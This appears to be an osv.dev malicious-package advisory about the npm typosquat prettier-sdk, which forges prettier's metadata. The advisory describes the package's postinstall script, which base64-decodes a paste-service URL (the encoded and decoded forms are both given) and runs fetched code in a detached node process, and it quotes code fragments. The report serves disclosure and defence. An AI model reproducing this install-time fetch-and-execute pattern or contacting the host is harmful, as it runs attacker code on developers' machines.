prettier-sdk @1.0.2
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4645
Ecosystem
npm
Summary
Package name prettier-sdk impersonates the top-tier prettier package (~50M weekly downloads), copying its README verbatim and forging metadata ( repository: prettier/prettier , homepage: https://prettier.io , author: James Long ). The postinstall script node./plugins/preinstall.js base64-decodes a hardcoded URL stored in a misleadingly-named variable HASH_KEY = "aHR0cHM6Ly9qc29ua2VlcGVyLmNvbS9iLzM2S0VN" (decodes to https://jsonkeeper.com/b/36KEM , an anonymous mutable paste service), HTTP GETs it via axios, and pipes the response body's cookie field to the stdin of a detached node process via spawn('node', [], { detached: true,... }) followed by child.stdin.write(s1); child.unref() . This executes arbitrary attacker-controlled JavaScript on every installer's machine at npm install time, with no integrity check, from a host the attacker can mutate at will. Three independent block signals stack: typosquat-with-malicious-payload against a top-100 package, install-time fetch-and-execute from an anonymous paste host, and base64 obfuscation of the C2 URL.
Source: amazon-inspector (80a3bdd18c28c0c045aaed2a3e5725b3b38cb45bc9c16d0b795c4334caed17a5)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.